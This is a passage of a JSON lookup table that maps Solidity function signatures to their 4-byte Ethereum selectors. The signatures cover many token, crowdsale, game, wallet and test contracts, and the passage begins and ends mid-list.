"getSaleContractTargetEtherMin(address)": "0x4cc53838", "getSaleContractIsFinalised(address)": "0xf612a62d", "setSaleContractDepositAddressVerified(address)": "0x179c537e", "setSaleContractFinalised(address)": "0x4aa83079", "setSaleAgentContract(address,string,uint256,uint256,uint256,uint256,uint256,uint256,uint256,address)": "0xa7a8add2", "getRemainingTokens()": "0xaf35ae27", "validateClaimTokens(address)": "0x45493057", "validateContribution(uint256)": "0x99f16c6e", "RocketPoolToken()": "0xb6757b50", "f2(uint256,uint256)": "0xe9f1c4c3", "ff(string)": "0x3e72df41", "consumePower(uint256)": "0xcb775d5a", "distributePowerToAddress(address,uint256)": "0x1c4bcbb0", "distributeGeneratedPower(uint256)": "0xe6d3f673", "addTenant(address)": "0x75c8f04b", "bitWatt(uint256)": "0xa4b31eb1", "changeIPFS(string)": "0xcd65908e", "ArtCertificate(address,bytes32,string,string,string,string,string,address)": "0xd6d76fb7", "changeArt(bytes32,string,string,string,string,string,address)": "0x2eef13cd", "ArtGallery()": "0xbf45db19", "generateFinalTokens(uint256)": "0xeed0fc03", "MyFinalizableCrowdsale(address)": "0xf53a93f8", "ImportTestC()": "0x3d75e106", "GxManagedWallet(address)": "0x00452636", "NeuroDAO()": "0x025e56d3", "ConsumeGas(uint256)": "0x61432e81", "AddValues(uint256,uint256)": "0x718167c4", "ThrowError()": "0xd8a74f3b", "ErrorContract()": "0x2f4e4c27", "isPublisherRegistered(address)": "0xc5277ddd", "findPublisher(address)": "0x709ecb39", "transferPublisherRecord(address,address)": "0x46743691", "unregisterPublisher(address)": "0x9d277a49", "registerPublisher(address,bytes32[5])": "0x650ce14c", "setTableTypesSize(uint256)": "0x9bca8a1e", "setTableSize(uint256)": "0xfa885329", "setMemorySize(uint256)": "0x903833cc", "setGlobalsSize(uint256)": "0x2eb0b45a", "setCallStackSize(uint256)": "0x6e6656d8", "setStackSize(uint256)": "0x6d544e6e", "makeZero(uint256)": "0x87d3a184", "setOp(bytes32)": "0xf6f844e4", "setCallPtr(uint256)": "0x2a0f189a", "setStackPtr(uint256)": "0xc48a3cbf", "setPC(uint256)": "0x64f06b39", "setReg3(uint256)": "0xc2a33485", "setReg2(uint256)": "0x400b56e5", "setReg1(uint256)": "0x4e7196c7", "setIreg(uint256)": "0xccaf4b03", "setMemsize(uint256)": "0x25f43ed5", "getOp()": "0xb4a2251e", "boolToUInt(bool,bool)": "0xfe261ab0", "getCorrespondingIntegerValue(bytes32,uint8,uint256)": "0x93b3a368", "getCountOfIntegerTypes(uint8[])": "0x6d38156f", "getObjectData(bytes32[],uint8[])": "0x82914e5d", "getPermittedContracts()": "0x3138ee5c", "permittedContractsCount()": "0x26df61f6", "removePermittedContracts(address[])": "0x0489fa70", "removePermittedContract(address)": "0xa98ad199", "addPermittedContracts(address[])": "0xdc02511e", "addPermittedContract(address)": "0x3836fe6e", "deleteBoolValue(bytes32)": "0x00a35aa2", "setBoolValue(bytes32,bool)": "0x52d2d83d", "getBoolValue(bytes32)": "0x8ffa9690", "DB()": "0x51c875d2", "MSP(address)": "0xee3cc63d", "isWinner(address)": "0x9d9ca28d", "getGuess(address,uint8)": "0x5d4453ba", "getGuessCount(address)": "0x04b1142c", "winProbability(address)": "0x97df5028", "getParticipant(uint256)": "0x1b9db2ef", "computeSecret(uint256,address,address)": "0xf9677e22", "setEndTimeStamp(uint256)": "0xc456354e", "getSuperManagerContractAddress()": "0x722bb4a8", "WeiCoin(address,uint256,uint256,uint256)": "0x02e8243e", "onpayInstallment(uint256,address,uint256)": "0xf8b332ad", "onNewLoan(uint256,address)": "0xc1bdff26", "newForge(bytes32,bytes32,address)": "0x6a3baaea", "licenseProductId(uint256)": "0x9425753c", "_isValidLicense(uint256)": "0x71d8d421", "getWithdrawBalance()": "0x710fe6f8", "getCountrySpots(uint16)": "0x60ad5bd0", "getActiveFlagRate(uint16)": "0x2c3f9b80", "getCompletedFlag(uint16,uint16)": "0xbed18966", "getActiveFlag(uint16)": "0x4d7c7485", "regSpots(uint16,uint16,bytes32)": "0x6c7afaba", "completedFlag(uint16)": "0xbc9abe67", "createFlag(uint16,uint256)": "0xe7de72a4", "regSpot(uint16,bytes32)": "0xe710efc6", "PonderAirdropToken()": "0xd4eb21ff", "ZperToken(address,uint256,uint256)": "0xdf9b3bae", "withdrawIncentives()": "0xe087cd55", "ZTToken()": "0xd8edbd79", "transferAndFreezing(address,uint256,uint256,uint256,uint8)": "0xb8a1fdb6", "setFreezing(address,uint256,uint256,uint8)": "0x51c3b8a6", "freezingBalanceInfoOf(address,uint256)": "0x78b83360", "freezingBalanceNumberOf(address)": "0x1a71d3db", "validBalanceOf(address)": "0xc783fb10", "clearExpiredFreezing(address)": "0xed8a9c0f", "isFreezer(address)": "0x6c65fd6a", "indexOf(address[],address)": "0x9fce5c8e", "removeFreezer(address)": "0x2acd2000", "addFreezer(address)": "0x526606c9", "init(uint256,string,string)": "0xfd9393c3", "BDToken()": "0x2ffdaa44", "ARA(uint256,string,uint8,string)": "0xad266df8", "FMCToken()": "0xc9956b05", "novaBurn()": "0x0ca5bdb4", "Smw()": "0xd184194b", "KIA()": "0x07f4556f", "LinearBeam()": "0x99cffe4d", "withdrawContractBalance(address)": "0x57fbb9df", "socialIdentityOfClaimerAddress(uint256,address)": "0x2c8f1b71", "twitterIdOfClaimerAddress(address)": "0x831e0485", "claimerOfSocialIdentity(uint256,uint256)": "0x786caff8", "claimerOfTwitterId(uint256)": "0x22fb730b", "ownerOfSocialIdentity(uint256,uint256)": "0xfa0bc8e1", "ownerOfTwitterId(uint256)": "0xd352a862", "decayedPriceOfCard(uint256)": "0xf544cf4f", "decayedPriceOfSocialIdentity(uint256,uint256)": "0x0f8d598a", "decayedPriceOfTwitterId(uint256)": "0x25f08fc4", "_updateCardPerkText(uint256,string)": "0x26f489f6", "_recordPlatformFee(uint256)": "0x9b76fbd6", "_recordFailedOldOwnerTransfer(address,uint256)": "0xf16b9422", "_triggerStashedPayoutTransfer(uint256)": "0x35a3fbb0", "_recordStashedPayout(uint256,uint256)": "0xd1fb386a", "_updateCardClaimerAddress(uint256,address)": "0x41583c4b", "_updateSaleInfo(uint256,uint256)": "0xeec3589d", "decayedPriceFrom(uint256,uint256)": "0xe0e1593c", "currentPriceInfoOf(uint256,uint256)": "0xec449e67", "_stealCardWithId(uint256)": "0xbde5c4a2", "_claimIfNeededThenSteal(uint256,uint256,address,uint8,bytes32,bytes32,uint256,uint256)": "0x4ea2f66a", "claimIfNeededThenSteal(uint256,uint256,address,uint8,bytes32,bytes32,uint256,uint256)": "0xdcedeeed", "claimTwitterIdIfNeededThenStealCardWithTwitterId(uint256,address,uint8,bytes32,bytes32,uint256)": "0xd537df3c", "stealCardWithId(uint256)": "0xce5d80e6", "_stealCardWithSocialIdentity(uint256,uint256)": "0x6770da62", "stealCardWithSocialIdentity(uint256,uint256)": "0xe58ba9e4", "stealCardWithTwitterId(uint256)": "0x792e79c5", "setCardPerkText(uint256,string)": "0xd26574ac", "_claimExistingCard(uint256,address)": "0x216c1606", "_claimSocialNetworkIdentity(uint256,uint256,address,uint8,bytes32,bytes32)": "0x8263e953", "claimSocialNetworkIdentity(uint256,uint256,address,uint8,bytes32,bytes32)": "0x0aa56368", "claimTwitterId(uint256,address,uint8,bytes32,bytes32)": "0x8f1af992", "setVerifier(address)": "0x5437988d", "setEconomyParameters(uint128,uint128,uint128,uint128,uint128,uint128,uint128)": "0x7b3179bc", "_setPlatformFeeRate(uint128)": "0x5a325fb3", "_setProfitSharingParameters(uint128,uint128)": "0x746796f0", "_setHourlyValueDecayRate(uint128)": "0x3abbf56a", "_setPurchasePremiumRate(uint128)": "0xe3c3f180", "_setInitialCardPrice(uint128)": "0xc53ee3a5", "_setMinCardPrice(uint128)": "0xa6a34dd3", "CryptoFamous(address)": "0x3f4e6d66", "withdrawFailedOldOwnerTransferAmount()": "0xa92f0cb9", "bursarPayOutNetContractBalance(address)": "0x81081184", "netContractBalance()": "0x0aa0fbe5", "authorized_recordPlatformFee()": "0xd04d8667", "authorized_recordFailedOldOwnerTransfer(address)": "0x0d2f2971", "authorized_recordStashedPayout(uint256)": "0x3519932e", "authorized_triggerStashedPayoutTransfer(uint256)": "0x634c5c51", "authorized_updateCardReserved1(uint256,uint8)": "0x8de04f87", "authorized_updateCardClaimerAddress(uint256,address)": "0xd2dd8d2a", "authorized_updateSaleInfo(uint256,uint256)": "0xc682d0bb", "authorized_createCard(uint256,uint256,address,address)": "0xf985f5fc", "authorized_changeOwnership(address,address,uint256)": "0xaa99474f", "setAuthorizedLogicContractAddress(address)": "0xdbb183c2", "authorized_setCardPerkText(uint256,string)": "0x25d83bb3", "CryptoFamousStorage()": "0xd2b74f70", "totalNumberOfCards()": "0x144be7eb", "_createCard(uint256,uint256,address,address)": "0x608eba96", "_recordFirstClaimTimestamp(uint256)": "0xa00223ec", "_changeOwnership(address,address,uint256)": "0xb1eefcc1", "lookUpClaimerAddress(uint256,address)": "0x94644764", "socialIdentityToCardId(uint256,uint256)": "0xd67b534e", "setBursar(address)": "0x51c81f01", "setGod(address)": "0xf9f2c161", "KelvinToken()": "0x0bc3a268", "sendBonus(address,address,uint256)": "0x5774ce4d", "sendBonusMany(address[],uint256[])": "0xf6c536a0", "initAuctions(uint256,uint256,uint256,uint256)": "0x0eab31b1", "skipInitBecauseIAmNotOg(address,address,uint256,uint256,uint256,uint256,bytes8,uint256)": "0xdf775a93", "whichAuction(uint256)": "0xfde9cded", "whichTick(uint256)": "0xd282866a", "currentAuction()": "0x496a698d", "currentTick()": "0x065e5360", "Auctions()": "0x83ab12e7", "closeAuction()": "0x378252f2", "initProceeds(address,address)": "0xae71d5da", "convertMetToEth(uint256,uint256,int256)": "0x59f96737", "convertEthToMet(uint256,int256)": "0x11f2eed1", "getEthForMetResult(uint256)": "0x6102d419", "getMetForEthResult(uint256)": "0x679d0ecb", "getMetBalance()": "0x2eb96988", "handleFund()": "0x7679a816", "init(address,address,address)": "0x184b9559", "subWithdrawFor(address,address)": "0x81240b9c", "multiSubWithdrawFor(address[],address[])": "0xe6f47613", "multiSubWithdraw(address[])": "0xbae1cc74", "subWithdraw(address)": "0x93b212bc", "getSubscription(address,address)": "0x5b75dd8d", "cancelSubscription(address)": "0x93d81d58", "subscribe(uint256,uint256,address)": "0xaa4925d7", "export(bytes8,address,address,uint256,uint256,bytes)": "0x46be2310", "importMET(bytes8,bytes8,address[],bytes,bytes32[],uint256[],uint256[],bytes)": "0x6ffbff9c", "rootsMatch(address,address)": "0xd2d85cf2", "getRoot(address)": "0x079cf76e", "setRoot(bytes32)": "0xdab5f340", "enableMETTransfers()": "0x4ee4d731", "initMETToken(address,address,uint256,uint256)": "0x195629de", "initSmartToken(address,address,uint256)": "0x0b0c8f1f", "approveLess(address,uint256)": "0x7240eccf", "approveMore(address,uint256)": "0x4cef0ff6", "initToken(address,address,uint256,uint256)": "0x3bf11a6c", "setTokenPorter(address)": "0x1987b887", "initMintable(address,address,uint256,uint256)": "0xc3f51fca", "priceAtInitialAuction(uint256,uint256)": "0xa8afc538", "priceAt(uint256,uint256)": "0x01dbdf44", "initPricer()": "0xc1f7c539", "returnForRedemption(uint256,uint256,uint256)": "0x1e892c21", "returnForMint(uint256,uint256,uint256)": "0xaf23e1f1", "fSub(uint256,uint256)": "0x293b682f", "fAdd(uint256,uint256)": "0xe8d47923", "fSqr(uint256)": "0x7e668cd2", "fSqrt(uint256)": "0x793d7165", "fDiv(uint256,uint256)": "0x9ef065bb", "fMul(uint256,uint256)": "0xd959cbd2", "externalPurchase(address,string,uint256,uint256,uint256)": "0xe57d880a", "getExternalFundsRaised(string)": "0x3b4a20f2", "currencyToHash(string)": "0x6d08bad2", "setPostICOSale(bool)": "0x7e7af34f", "setFreeTransferAllowed(bool)": "0xc34b6ae0", "setWeiPerUSD(uint256)": "0xcad461ea", "setTokenNAVMicroUSD(uint256)": "0xa20cf0e7", "setDistributedAutonomousExchange(address,address)": "0x39d2be30", "setRedemptionContract(address,address)": "0xcd0f26c6", "setNAVAdmin(address,address)": "0xf9d593c8", "setKYCAdmin(address,address)": "0xf2a38dac", "transferOwnership(address,address)": "0x6d435421", "PentacoreToken()": "0x40a5bfc5", "RadToken()": "0xdc5bc461", "transferFree(address,uint256)": "0xcf6d06a1", "transferFreeze(address,uint256)": "0x631dd1a2", "tan_lian()": "0x50395188", "freeBalancesOf(address)": "0xe94dc568", "LCAP()": "0x9d8f2b17", "TestTest()": "0x902ab12f", "get_this_balance()": "0x9caaa7f4", "admin_transfer(address,uint256)": "0x0f822b78", "admin_withdraw_all(address)": "0x2b7568d9", "admin_withdraw(uint256)": "0x2eacfd0f", "get_info(address)": "0x816d3dc1", "get_total_info()": "0x46f19888", "admin_inactive_withdraw(address)": "0xfed3f18d", "admin_active_withdraw(address)": "0xfd53e7b4", "admin_inactive_dividend(address)": "0xf19414d5", "admin_active_dividend(address)": "0x3cc26b71", "admin_inactive_withdrawable()": "0xec32e4e8", "admin_active_withdrawable()": "0xe4160e48", "admin_inactive_payable()": "0xfde0a64d", "admin_active_payable()": "0x128f8e04", "admin_set_isRequireData(bool)": "0xd8e2e392", "admin_set_shopStorePrice(uint256)": "0xdcdc7254", "admin_set_deposit(address)": "0xc69b761f", "admin_del(address)": "0xb9089280", "admin_add(address)": "0x279c94c0", "get_admin_list()": "0x12ebca9c", "admin_set_min_pay(uint256)": "0x49741098", "get_exchange_wei()": "0x4a661152", "admin_set_exchange_rate(uint256)": "0xc15c09b5", "admin_set_shopStoreRegister(address,address)": "0x37d365de", "admin_set_exchange_rate(uint256[])": "0xd71e58f8", "admin_dividend(uint256)": "0xd9e79c72", "admin_deposit(uint256)": "0x73674ecc", "admin_check(address)": "0x80296dec", "isLeading4FF(address)": "0x45705906", "get_orderAddress(address,address,uint256,uint256,uint256,uint256)": "0x6dc9ab89", "Pixiu()": "0x2aa49dd7", "FootBallCoin()": "0x9c45510d", "CelticsCoin()": "0x6e468a8a", "updateTileTimeStamp(uint16)": "0xcdde5413", "setClaimerForTile(uint16,address)": "0x2f54a61e", "updateTileBlockValue(uint16,uint256)": "0x9ea69541", "storeClaim(uint16,address,uint256)": "0x2620f61c", "isNewTile(uint16)": "0xa3ab5045", "getTileClaimerAndBlockValue(uint16)": "0x57cc5941", "getTile(uint16)": "0xac2c8bb5", "hasUser(address)": "0xa6c4ec0e", "setBwMarketValidCaller(address)": "0xe8cf958e", "setBwValidCaller(address)": "0x67c7f3a8", "setBwServiceValidCaller(address)": "0x47a99264", "getBoostFromTile(address,address,address,uint256)": "0x9e6bcba5", "fromTileId(uint16)": "0x94a0b878", "toTileId(uint8,uint8)": "0x5cc1ad7f", "isAdjacent(uint8,uint8,uint8,uint8)": "0x10b23ceb", "ceil(uint256,uint256)": "0x8587be6e", "NebuliToken()": "0x62985b87", "setNewContractAddress(address)": "0xf3022de8", "getIntention(uint256)": "0x58f4be1e", "setAchievedDate(uint256,uint64,uint64)": "0xaad85f7c", "updateIntention(uint256,string,string,string)": "0xfeaa4cf3", "_createIntention(address)": "0x2cead42c", "createIntention(address)": "0x3db9c4aa", "getFreezingSummaryOf(address)": "0x1cfe699e", "ownerCanBurn(bool)": "0x2fbc8353", "ComplexChildToken(address,string,string,uint256,uint8,bool,int256,bool)": "0x1f534715", "refundERC20(address,address,uint256)": "0x48c44712", "refundETH(address,uint256)": "0x4bd22766", "Refundable()": "0x22f77d2a", "Bitansuo()": "0xc7786275", "ownerChangeSlogan(string)": "0xe1d94d94", "Slogan(string)": "0xdbfa980b", "ReVo()": "0xaf2b2e5c", "ElephantsPaymentCoin()": "0x2a2bb728", "disableTokenTransfer()": "0xe2a9ca4c", "enableTokenTransfer()": "0x3a764462", "unlockAddress(address,bool)": "0x60805e5a", "DEFACTO()": "0xcd0e8900", "ltcBalance()": "0xf4e2d68b", "withdraw2(uint256)": "0x34273351", "withdraw1(uint256)": "0x0f87a044", "LOCKTokenCOINLock(address,uint256,uint256,uint256)": "0x503765c6", "LOCKTokenCOIN()": "0xfd9133f3", "mallocBudget(address,uint256)": "0xbacd2a90", "ParcelXGPX(address[],uint256)": "0xa64b63a8", "COBToken()": "0xc98cf6e3", "TrekChain()": "0x992c3ff1", "increaseInvestedWei(uint256)": "0x8dfb015f", "Tier(uint256,uint256,uint256,uint256,uint256,uint256)": "0x55a129bd", "WhiteElephant()": "0xcd5dba1e", "DinoToken(uint256)": "0x3132605d", "forwardFunds(address,uint256)": "0x92878bd0", "MainSale(address,uint256,uint256,uint256)": "0xd705d6d7", "edit(uint256,string,string)": "0x29f11c8d", "create(string,string,uint256)": "0x3ca6d100", "nameOf(uint256)": "0x051a2664", "codepointsOf(uint256)": "0x0e5d095d", "setUsername(bytes16)": "0xa43fecbc", "usernameOf(address)": "0x7898acef", "CryptoEmojis()": "0xff69f35e", "setupMultisig(address,address)": "0x8d8acee9", "WithdrawalToken(uint256)": "0xc4f35d6c", "WithdrawalETH(uint256)": "0xf03dd010", "setBeginTime(uint256)": "0x5eb17cdb", "setTransfersAllowed(bool)": "0xf3cd1c28", "TokenSaleAfterSplit(uint256,uint256,uint256,address,address,bool,uint256)": "0x8b0fc19a", "ControlledToken(uint256,string,uint8,string)": "0xd7c0d42d", "ATCToken()": "0x46ed3199", "OMGCatCoin()": "0x48e11f70", "WCCCOIN()": "0x1db256e4", "startGame(uint256)": "0xe5ed1d59", "getETHBalance()": "0x6e947298", "exchangeForQIU()": "0x379ba2ab", "exchangeForETH(uint256)": "0xae7b3825", "originTransfer(address,uint256)": "0x1d32ab99", "ownerTransferFrom(address,address,uint256)": "0x53043490", "QIUToken()": "0xe878d65f", "viewServiceReward()": "0x8cccf2df", "viewSentBonuses()": "0x29699a88", "serviceFeeWithdraw()": "0x97ae4491", "addServiceReward(uint256)": "0x54567923", "addBonus(uint32[],uint64[])": "0x7f3df4bb", "spendUserBalance(uint32,uint64)": "0x94d10c41", "addUserBalance(uint32,uint64)": "0x0e5fc721", "systemWithdraw(address,uint64)": "0x873bdee0", "withdraw(uint64)": "0x750f0acc", "sendTo(address,uint64)": "0xd77a86a0", "registerUserWallet(address,uint32)": "0xb5232ba3", "setDispatcherAddress(address)": "0xafaebf3e", "hasTrade()": "0xf0d1c8ce", "tradeStarttime(uint256)": "0xe02d1c0e", "CheckCarToken()": "0x5792e1de", "SGTCoin(uint256)": "0x93c9b63e", "selltokens0()": "0xdab83b9a", "ProofOfCryptoNick()": "0xbc174df3", "SetPriceIncrease(uint16)": "0xe803bcc6", "SetHFee(uint16)": "0x244f828a", "SetDevFee(uint16)": "0xc7990f70", "DoDev(uint256)": "0x9c732203", "AddMultipleItems(uint256,uint8)": "0x086a9cd8", "updateCampaign(address)": "0xd575f332", "listCreatedTokens()": "0x32c3de5d", "newToken(string,string,uint256,address,uint256)": "0x598e3183", "reallocate(address,address,address,uint256)": "0xa1ef9b8f", "pay(address,address,address,uint256)": "0x4a0ba49d", "updateBalance(address,address,uint256)": "0x34954a99", "topup(address,address,uint256)": "0x1e2a9d4c", "balance(address,address)": "0xb203bb99", "loik()": "0x0ec2c5d7", "EthPyramid00XX()": "0xb440b5c7", "TestAnyChain()": "0x579078cf", "getMessageRequestHashUsingProviderAddress(address,uint256,address)": "0x3d3bc43e", "addMedicalProviderReply(address,string,string)": "0x434e0618", "addPatientReply(address,string,string,address)": "0x6456d071", "addRequest(address,string,string,address)": "0x69e22b20", "_setNumber(uint256)": "0x44587e3e", "setHidden(address)": "0x97145273", "countInstructors()": "0xca8ab933", "getInstructor(address,address)": "0x0c34644c", "getInstructors()": "0x5eff7dae", "setInstructor(address,address,uint256,bytes16,bytes16)": "0xfc11f71c", "CluckCoin()": "0x7c33774d", "CutieBitToken()": "0x81584ff3", "init(address,uint256[],address[])": "0x87a3be75", "LCToken(uint256,string,uint8,string)": "0x800d0f6a", "safeWithdrawEther()": "0x81c385b5", "transferStep3(address)": "0x711caf40", "transferStep2(address)": "0x765b8dee", "getAllSteps()": "0x9196e481", "setValueStep3(uint256)": "0xde51f57e", "setValueStep2(uint256)": "0xfa461f33", "setValueStep1(uint256)": "0x81eb3e01", "setAllSteps(uint256,uint256,uint256)": "0x05e437b5", "getOwnerClientDetails()": "0xe4a2a8af", "countNoClients()": "0x13c58cbb", "getClients(uint256)": "0x42dd519c", "addClient(string,string,string,string,uint256,uint256,uint8,uint8)": "0xbe3ee935", "JTEToken()": "0x893d4948", "YunPengToken(uint256,string,uint8,string)": "0x3640e413", "dePesoToken()": "0x33e8b084", "addGoal(string)": "0x42e35f63", "Commitment()": "0x647f7058", "ExpandCoin()": "0x635b9047", "addValue(address,uint256)": "0xca0b1878", "ViewToken()": "0xcd65bb67", "TransferToken(address,uint256)": "0x9dd3045b", "BuyToken(uint256)": "0xfcb0368c", "TokenLeft()": "0x4628b375", "DepositBalance()": "0x85673296", "freeTokens(address,address,uint256)": "0x6d43b489", "freezeof(address)": "0x09bc4933", "ExchBtcToken()": "0x4a268f52", "Tango1Token()": "0x6927f800", "offlineCallback(bytes32)": "0x4e37af4e", "doOraclize(bool)": "0x71d141f9", "getRoomInfo(uint256)": "0x6790d2b5", "getPlayedInfo(address)": "0xca990859", "setSystemOraGasLimit(uint256)": "0xdf2a201b", "CIC()": "0xdef51dc2", "ZebraToken(uint256,string,uint8,string)": "0x323560b5", "Beruqtoken()": "0x74eac2e6", "STSTEST()": "0x8b66d153", "DHUBTest02()": "0x55a5a8d4", "HybridToken(string,string,uint8)": "0x10fa85c6", "removeLaureato(string)": "0x27d8fb97", "sub_sessione(string,uint256)": "0xc018fe0d", "sub_codicefiscale(string,uint256)": "0x4826a425", "sub_matricola(string,uint256)": "0x6cd9db29", "addLaureato(string,string,string,bytes32)": "0x7cef6966", "verificaCertificato(string,bytes32)": "0x7006d538", "certificato(string)": "0x697aefe2", "NBELToken()": "0x9406e273", "verifySignatures(bytes32,uint8[],bytes32[],bytes32[])": "0xcb6367d1", "submitTransactionWithSignaturesToken(address,address,uint256,uint8[],bytes32[],bytes32[])": "0x856eb2d1", "submitTransactionWithSignatures(address,uint256,uint8[],bytes32[],bytes32[])": "0x828806cd", "olympusTest()": "0x7e6eee20", "balanceOwner(address)": "0x0f601679", "sendCoins(address,address,uint256)": "0x4eca4b19", "Bitroneum()": "0x41ce909f", "getNujaNumber()": "0x9de9205a", "addNuja(address)": "0x7bde5628", "NujaRegistry()": "0xf18771de", "notarizeHash(uint256,string,string,string,bytes32)": "0x726199b5", "HitToken(uint256,string,uint8,string)": "0x5e6936ac", "SolusPlatform()": "0x836d8b2a", "ZTHToken(uint256,string,string,uint8)": "0xe1a382f4", "SolusToken()": "0xc6a97c60", "BugisNet()": "0x45febc32", "MickeyToken()": "0x33bfaf4e", "_calcReward()": "0x23bd9914", "updateClaimable(uint256)": "0xd28e4355", "_remainReward()": "0x7432542d", "_isTrue(address)": "0xf5bd8f5f", "NOETToken()": "0x861d4e51", "AKTestEther1(address,address,address,uint256,uint256,uint256)": "0xfda0078f", "MadTok()": "0x9355d6db", "dispute(address,bool)": "0x64bd3066", "ticket(address,bool)": "0x113ca356", "rentModified(address,uint256)": "0xedf92ff3", "lockInGuess(uint8)": "0x2c0e0054", "addSweeper(address,address)": "0x77bb09eb", "makeWallet()": "0xa9b1d507", "changeDestination(address)": "0x5e949fa0", "changeAuthorizedCaller(address)": "0x19449cb2", "Controller()": "0x64679356", "sweeperOf(address)": "0x3c18d318", "UserWallet(address)": "0xaff23300", "DefaultSweeper(address)": "0x98278bc8", "AbstractSweeper(address)": "0x9026ad2e", "StopGame()": "0xf50ab247", "Question()": "0xc8166a8a", "Play(string)": "0x648f0bde", "NewQuestion(string,bytes32)": "0x3e3ee859", "StartGame(string,string)": "0x1f1c827f", "viewSuperOwner()": "0xd3a516d3", "OwnableContract()": "0x566da66c", "unBlockContract()": "0xd64ee8d2", "doBlockContract()": "0x3e8cc273", "BlockableContract()": "0x1ed8f023", "isApproved(address,address,uint256)": "0xe5af48d8", "isApproved(address,address)": "0xa389783e", "EIP20Token()": "0xd36e0f39", "returnPurchasedEther()": "0xd48a1f6e", "endSale()": "0x380d831b", "ownerSale(address,uint256)": "0xc890635a", "ownerAirdrop(address,uint256)": "0x64e19bdd", "hasAirdrop(address)": "0x6c4be791", "airdrop()": "0x3884d635", "etherToToken(uint256)": "0xe095f814", "PayWinner(address)": "0x05b961e6", "AddTicket()": "0xb204bb5d", "getLastTicketTime()": "0x19c97154", "StackLottery()": "0x4f879ff0", "ChangeAmountPrice(uint256)": "0xf9f53be0", "ethDividendAmount()": "0xefe998b9", "AddTower(uint32,uint16,uint16,uint256,uint256,uint16,uint16)": "0xb98fa504", "tokenScaleFactor()": "0xb1934151", "amountToCreate()": "0x9c50450f", "sellTokens()": "0x9904e174", "numTokens()": "0x8e499bcf", "ShootRobinHood(uint256,string)": "0x88fb4af0", "Towers(uint256)": "0x7dbf1fe6", "tokenIncrease()": "0x4f3fed94", "tokensPerAddress(address)": "0x425432b1", "next_tower_index()": "0x2c574a94", "TakePrize(uint256)": "0x2a79fa0e", "ChangeFee(uint8)": "0x28d90b63", "OpenGame()": "0x0f7e1653", "tokenDividend()": "0x0d2a246e", "getTimer(uint256)": "0x0aea47bc", "tokenStartPrice()": "0x052a6849", "History(uint256)": "0xa21f0368", "LastMsg()": "0x222a95ee", "Revoce()": "0xcd8b02c8", "SetMessage(string)": "0x88fabb3a", "priceFactor()": "0xdfb2866d", "bid(address)": "0x9cf5453d", "ceiling()": "0x753ed1bd", "changeSettings(uint256,uint256)": "0x36d02c94", "highestBid()": "0xd57bde79", "biddingTime()": "0xd074a38d", "highestBidder()": "0x91f90157", "auctionEndTime()": "0x4b449cba", "snt_claimed(address)": "0xc54d59a1", "total_snt_claimed()": "0x1b677b08", "createBuildingOmni(uint32,uint8,uint8,uint8,uint8,uint8,address,bool)": "0xe2d1da31", "totalDistrictSupply()": "0xe19ab767", "startingPrice()": "0xd6fbf202", "setProgress(uint256)": "0xd342275e", "propertyIndexToOwner(uint256)": "0xd1f95204", "rescueLostProperty(uint256,address)": "0xc02b04d8", "buildingIsPublic(uint256)": "0xbce70868", "unitCreationFee()": "0xba1cd983", "propertyIndexToData(uint256)": "0xb6b9d57e", "canCreateUnit(uint256)": "0xabefe7ac", "world(uint256,uint256,uint256)": "0xa0af0127", "districtToBuildings(uint256,uint256)": "0x94c33d90", "setUnitCreationFee(uint256)": "0x9304ddc8", "districtLimit()": "0x8af2ce26", "createUnit(uint256)": "0x7774e950", "createUnitOmni(uint32,address)": "0x6d80244d", "propertyIndexToApproved(uint256)": "0x6773b75f", "buildingToUnits(uint256,uint256)": "0x5852f5c1", "progress()": "0x577bd336", "updatePropertyData(uint256,string)": "0x574edd28", "districtToBuildingsCount(uint256)": "0x50efc7c0", "updateEnabled()": "0x4abd8f65", "getProperty(uint256)": "0x32665ffb", "createBuildingAuction(uint32,uint8,uint8,uint8,uint8,uint8,bool)": "0x2b7b3a6c", "createDistrictOmni(uint8,uint8,uint8,uint8)": "0x297882d5", "setUpdateState(bool)": "0x27b00b3e", "buildingToUnitCount(uint256)": "0x229b9bc5", "updateBuildingPrivacy(uint256,bool)": "0x13b63f60", "auctionDuration()": "0x0cbf54c8", "confirmTransactionWithSignatures(bytes32,uint8[],bytes32[])": "0xfbc6d0ff", "revokeConfirmation(bytes32)": "0xf3fc536d", "getExecutedTransactions()": "0xe6a6d4c8", "required()": "0xdc8452cd", "getPendingTransactions()": "0xd11db83f", "executeTransaction(bytes32)": "0xc69ed5f2", "at(address)": "0xdce4a447", "switchDeity(address)": "0xa70a9ad7", "getFirst()": "0x1e223143", "switchWizard(address)": "0xedb27f4e", "MultipleConstructorTest(bool)": "0x705eeb90", "sweepDeityCommission(uint256)": "0xa819819b", "deityBalance()": "0x2d116186", "MultipleConstructorTest()": "0xd96aee49", "sweepWizardCommission(uint256)": "0xcb553ac9", "voidFailedPayment(uint256)": "0xe6e91cfc", "getBAddress()": "0x19a278b9", "resendFailedPayment(uint256)": "0x715ef4ff", "recordCommission(uint256)": "0x59a547b0", "getBlockCreatedOn()": "0x70961774", "setGreeting(string)": "0xa4136862", "claimThroneFor(bytes,address)": "0xd6d902c4", "Replicator()": "0xa15afb48", "claimThrone(bytes)": "0x2ea459b8", "getBlockNumber()": "0x42cbb15c", "isLivingMonarch()": "0x5fbddcf3", "Greeter(string)": "0x4f8e624e", "createHumanStandardToken(uint256,string,uint8,string)": "0x08216c0f", "currentClaimPrice()": "0x64325ddb", "codeAt(address)": "0xd35b9d83", "lastClaimPrice()": "0xfe757fb5", "verifyHumanStandardToken(address)": "0xfc94dd18", "computeNameHash(bytes)": "0xa2f3ede2", "purchase()": "0x64edfbf0", "validateName(bytes)": "0xbe592488", "HumanStandardTokenFactory()": "0xdb2a0cb7", "setMaxSupply(uint256)": "0x6f8b44b0", "isSafePunctuation(bytes1)": "0x992ae976", "setPrice(uint256,uint256,uint64)": "0xd4088e33", "updateOwner(address)": "0x880cdc31", "roundMoneyDown3SF(uint256)": "0x3ab1e703", "getValue(uint8,uint8)": "0x0e13b9af", "getTime()": "0x557ed1ba", "sendWithAllOurGasExcept(address,uint256,uint256)": "0x1ebe5c0f", "TwoD()": "0xbe7cddf8", "SimpleStablecoin()": "0x5dac1601", "sendWithExtraGas(address,uint256,uint256)": "0x5460ef10", "register(bytes,bytes)": "0xa3747fef", "getElevation(uint8,uint8)": "0x4166c1fd", "getValue(uint8)": "0x181be00d", "StructAndFor()": "0x80db79d9", "getArray()": "0xd504ea1d", "getArraySettingResult()": "0xb8c86aa6", "sendOneEtherHome()": "0xf239e528", "setArray(uint8[10])": "0xa311dd70", "getContractCreationValue()": "0x6c6f1d93", "ArrayRR()": "0xf00aac7f", 